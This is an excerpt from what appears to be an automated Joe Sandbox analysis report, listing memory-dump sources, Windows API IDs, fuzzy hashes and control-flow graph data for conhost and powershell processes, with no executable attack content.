                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 6aacb676702e2f4a08e5ca5213220d171fe28d530fb63d4b4a81c7c8b365879a
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 07515D3A300680CFEB748F269E4439977A1F354BD8F144116DB99ABBD6CB3AD458EB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: b72ebae929e233b0ccfb406de4a249b09307667aee3c71932a765234bc5a29df
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 9151AE3A300680CAEB748F6799443D877A8F3D4B94F1581A5DA99C7BD5CFBAC460CB41
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID: pid_
                          • API String ID: 517849248-4147670505
                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction ID: df5203a1a2c48d3e6539b3c5bd7a2118570d2d6bed1ae1af7d97246ff8d65bed
                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction Fuzzy Hash: BC117C39310B81D6EB109B25EE003DA62A4BB8A7C1F804035EA49E3B96EF7AC905C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction ID: 6d3580032cbf4e1325df24ad2b470a463ca845ec06f51c8f77204dee9577e004
                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction Fuzzy Hash: F0D1CD32714A94C9E711CFAAEC402DC37B2F355BE8F445226DE5EA7B99DA35C506C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction ID: f2eea10d51a52c92b53b38b1362babb25df4647851a90e3ad7ae00c032010ed3
                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction Fuzzy Hash: A8011332A50A90DAE714DF66AE042A977A2F788FD0B095025DB4993728DF39E491CB40
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000166BE4A28DF), ref: 00000166BE4A2A12
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction ID: b3cd6a23189f8c94c157d1149247f8b6a523cb09a0fe4b0d0bac6bd12b05ad48
                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction Fuzzy Hash: A8910132750651CAFB608F659C503ED3BA4F348BE8F446136DE0AA3B85DB36C485E308
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction ID: abfea608fafa9835ee5f108dc4ef6ef1037b041ea70e306f0180a9217c567f39
                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction Fuzzy Hash: 47112736B50F04CAEB00CF64EC953EC33A4F7197A8F441E21EA6E867A4DB78C1548740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction ID: 5cabd43dcfbb229096699e4d06bf259754d875480af7926e571bec163fee44bd
                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction Fuzzy Hash: 5B71A33A300B81CAE774DF66AE543EA6794F385BC4F444026DD4AE7B9ADE36CA00C744
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm
                          • API String ID: 3242871069-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: b6a8e153242baea9c79be2d116e95aba4e6a0308998db6c8a6f82f034ceb8f1a
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: FA51B23A311A00CAEB65CF17EC44BAC3799F384B99F158165DA4A87B88DFFAC841C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 7eac7314488a9bb72efe8657661dee72cdb7991daef02310ef8eaa13d7aa0bf7
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 9961AD36608BC4D5EB718F16E8407DAB7A4F7C5B98F048255EB9887B99CFB9C190CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: 8828c7f4bf4e7af03dc153c73066f6a33c1333af54bbbdbdcddb961196a96e0a
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: 8C51EF3A308781C9EA64DE2ABE543EA6791F7C5BD0F440065CE49B3B8BDA3BC804C744
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction ID: 5ec8d02e71ede376c3dfc2ce02b05ed3984eeb6ce0a3fcbdc34f378d71ef00e6
                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction Fuzzy Hash: C541BE72725A80C6EB608F65EC447EAB7A4F3887E4F845132EA4DC7798EB39C541CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction ID: 27a4549cc9ede0cff28c0aa8fee22ba256c55b169a5d567dd640fec71190195b
                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction Fuzzy Hash: 58112836214B8086EB218B25FD44299B7E5F788B94F584220EF8D47B69DF3DC551CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction ID: 7010ab51b8642dcd68b1a44e63c629988575e798b40f3b3bf729794b0ec47a51
                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction Fuzzy Hash: EA11C035B01B80C9EA15CB66AD042A977B1FB89FD0F595124DE8E93725EF39E442C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction ID: 1385b4f492e429a80cbdd5666b288bb9fdc7d9de207b08cefe6d08ad4edf924f
                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction Fuzzy Hash: B4E06D31B41604EAE7148F62DC083A936E2FB88FA5F44D024C90947350EF7E94998B40
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction ID: bab91b6a2e6472a1b2b6ff6548e82c1fd53ae5d0f954bfdf85b2d1d1306d2bd8
                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction Fuzzy Hash: FEE01271B51504EBE7189F62DD043A976E2FB8CF65F449034C90947310EE3D9499DB10

                          Execution Graph

                          Execution Coverage:3.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:8
                          Total number of Limit Nodes:1
                          execution_graph 8665 480a990 8668 480a9b1 8665->8668 8671 480a4c4 8665->8671 8667 480a9b8 8668->8667 8669 480aaa4 CreateFileW 8668->8669 8670 480aae1 8669->8670 8672 480aa50 CreateFileW 8671->8672 8674 480aae1 8672->8674 8674->8668

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7490ad0-7490af5 1 7490afb-7490b00 0->1 2 7490c63-7490caa 0->2 3 7490b18-7490b1c 1->3 4 7490b02-7490b08 1->4 10 7490ec9-7490f18 2->10 11 7490cb0-7490cb5 2->11 8 7490c13-7490c1d 3->8 9 7490b22-7490b24 3->9 5 7490b0a 4->5 6 7490b0c-7490b16 4->6 5->3 6->3 12 7490c2b-7490c31 8->12 13 7490c1f-7490c28 8->13 14 7490b67 9->14 15 7490b26-7490b37 9->15 57 7490f1a-7490f20 10->57 58 7490f32-7490f41 10->58 20 7490ccd-7490cd9 11->20 21 7490cb7-7490cbd 11->21 16 7490c33-7490c35 12->16 17 7490c37-7490c43 12->17 18 7490b69-7490b6b 14->18 15->2 28 7490b3d-7490b45 15->28 23 7490c45-7490c60 16->23 17->23 18->8 25 7490b71-7490b89 18->25 34 7490cdf-7490ce2 20->34 35 7490e71-7490e7b 20->35 26 7490cbf 21->26 27 7490cc1-7490ccb 21->27 44 7490b8b-7490b91 25->44 45 7490ba3-7490bb6 25->45 26->20 27->20 32 7490b5d-7490b65 28->32 33 7490b47-7490b4d 28->33 32->18 39 7490b4f 33->39 40 7490b51-7490b5b 33->40 34->35 41 7490ce8-7490cef 34->41 42 7490e89-7490e8f 35->42 43 7490e7d-7490e86 35->43 39->32 40->32 41->10 46 7490cf5-7490cfa 41->46 49 7490e91-7490e93 42->49 50 7490e95-7490ea1 42->50 51 7490b93 44->51 52 7490b95-7490ba1 44->52 75 7490bb8-7490bbe 45->75 76 7490bce-7490c10 45->76 55 7490cfc-7490d02 46->55 56 7490d12-7490d16 46->56 59 7490ea3-7490ec6 49->59 50->59 51->45 52->45 62 7490d04 55->62 63 7490d06-7490d10 55->63 56->35 64 7490d1c-7490d20 56->64 65 7490f22 57->65 66 7490f24-7490f30 57->66 73 7490f43 58->73 74 7490f45-7490f51 58->74 62->56 63->56 70 7490d60 64->70 71 7490d22-7490d33 64->71 65->58 66->58 77 7490d62-7490d64 70->77 71->10 86 7490d39-7490d3e 71->86 81 7490f53-7490f57 73->81 74->81 82 7490bc0 75->82 83 7490bc2-7490bc4 75->83 77->35 84 7490d6a-7490d6e 77->84 82->76 83->76 88 7490d81 84->88 89 7490d70-7490d7f 84->89 90 7490d40-7490d46 86->90 91 7490d56-7490d5e 86->91 92 7490d83-7490d85 88->92 89->92 93 7490d48 90->93 94 7490d4a-7490d54 90->94 91->77 92->35 95 7490d8b-7490da5 92->95 93->91 94->91 98 7490dc8 95->98 99 7490da7-7490db0 95->99 102 7490dcb-7490dcf 98->102 100 7490db2-7490db5 99->100 101 7490db7-7490dc4 99->101 103 7490dc6 100->103 101->103 104 7490dd1-7490dda 102->104 105 7490df2 102->105 103->102 108 7490ddc-7490ddf 104->108 109 7490de1-7490dee 104->109 106 7490df5 105->106 111 7490dfd-7490dff 106->111 110 7490df0 108->110 109->110 110->106 113 7490e01-7490e07 111->113 114 7490e17-7490e6e 111->114 115 7490e09 113->115 116 7490e0b-7490e0d 113->116 115->114 116->114
                          Strings
                          Memory Dump Source
                          • Source File: 0000001F.00000002.1725886022.0000000007490000.00000040.00000001.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_31_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q
                          • API String ID: 0-2324301696
                          • Opcode ID: ffb1f42f7aa8b660ba2722d46f1d6ea672e41d78627d4736701b4b8f00421635
                          • Instruction ID: 63e10490ad62f09c4f94161b141b675c20af44425f7966ba9b328940dbb36d05
                          • Opcode Fuzzy Hash: ffb1f42f7aa8b660ba2722d46f1d6ea672e41d78627d4736701b4b8f00421635
                          • Instruction Fuzzy Hash: D2C103B1B0420BCFDF248A6894147EBBFA2AF86210F18C47BD815CB365DB31D992C791

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 231 480a990-480a9a7 232 480a9b1-480a9b6 231->232 233 480a9ac call 480a4c4 231->233 234 480a9e3-480aa9c 232->234 235 480a9b8-480a9e2 232->235 233->232 246 480aaa4-480aadf CreateFileW 234->246 247 480aa9e-480aaa1 234->247 248 480aae1-480aae7 246->248 249 480aae8-480ab05 246->249 247->246 248->249
                          Strings
                          Memory Dump Source
                          • Source File: 0000001F.00000002.1721774955.0000000004800000.00000040.00000001.00020000.00000000.sdmp, Offset: 04800000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_31_2_4800000_powershell.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID: 4Lq
                          • API String ID: 823142352-2237474892
                          • Opcode ID: 3592a2ddd739dde892bc1809e0314f661537efbc53d3ee6778e20cc39bd15496
                          • Instruction ID: af794c651b9aba074263a7c5dc48ce0d575ef3d23810563b2e637be3ab5157eb
                          • Opcode Fuzzy Hash: 3592a2ddd739dde892bc1809e0314f661537efbc53d3ee6778e20cc39bd15496
                          • Instruction Fuzzy Hash: CA41AB71E003099FDB14DFA9D845B9EFBF0BF48310F148669E919AB380DB74A941CBA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 389 480a4c4-480aa9c 392 480aaa4-480aadf CreateFileW 389->392 393 480aa9e-480aaa1 389->393 394 480aae1-480aae7 392->394 395 480aae8-480ab05 392->395 393->392 394->395
                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000003,00000000,00000002,?), ref: 0480AAD2
                          Memory Dump Source
                          • Source File: 0000001F.00000002.1721774955.0000000004800000.00000040.00000001.00020000.00000000.sdmp, Offset: 04800000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_31_2_4800000_powershell.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 3913da52d1e640c2372d428d11f83e50bdd4b531c840a2d1a45c87219f5e399b
                          • Instruction ID: ce692a788341fba2a2fce627a7f0d6ed92f1e48e06e6960634ab283b0b91b992
                          • Opcode Fuzzy Hash: 3913da52d1e640c2372d428d11f83e50bdd4b531c840a2d1a45c87219f5e399b
                          • Instruction Fuzzy Hash: A02148B1D003499FCB10CF99C940A9EFBB4FB08310F008129E918A7240C374A950CFA0
                          Strings
                          Memory Dump Source
                          • Source File: 0000001F.00000002.1725886022.0000000007490000.00000040.00000001.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_31_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                          • API String ID: 0-1794337482
                          • Opcode ID: 5a679b4751fe119ba9043cd284dedf8c9a74c743629ebf3f1673563f7ac0fecd
                          • Instruction ID: def2b6e91f5924403d9a218b19356ff1b644d05e7cdaa41248295a94e24cceb0
                          • Opcode Fuzzy Hash: 5a679b4751fe119ba9043cd284dedf8c9a74c743629ebf3f1673563f7ac0fecd
                          • Instruction Fuzzy Hash: FAF1E2B1B043079FDF258A6984117ABBFA2AFC5211F18C47BD945CB361DB31D892C7A1
                          Strings
                          Memory Dump Source
                          • Source File: 0000001F.00000002.1725886022.0000000007490000.00000040.00000001.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_31_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$$q$$q
                          • API String ID: 0-3199993180
                          • Opcode ID: a0c4e4285151452ba192ba9817f7531b6983961365bec644c154a0645e98f8e4
                          • Instruction ID: a4fbe1a8fed14c740e435206b992b5957f39f05ed63ff3e06ad06177b7f3cdbd
                          • Opcode Fuzzy Hash: a0c4e4285151452ba192ba9817f7531b6983961365bec644c154a0645e98f8e4
                          • Instruction Fuzzy Hash: 8701A72171D3C79FDB2B123928211626FB29FC759072E45EBE481CB3A3D9264D46C3A7

                          Execution Graph

                          Execution Coverage:74.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:25.7%
                          Total number of Nodes:101
                          Total number of Limit Nodes:9
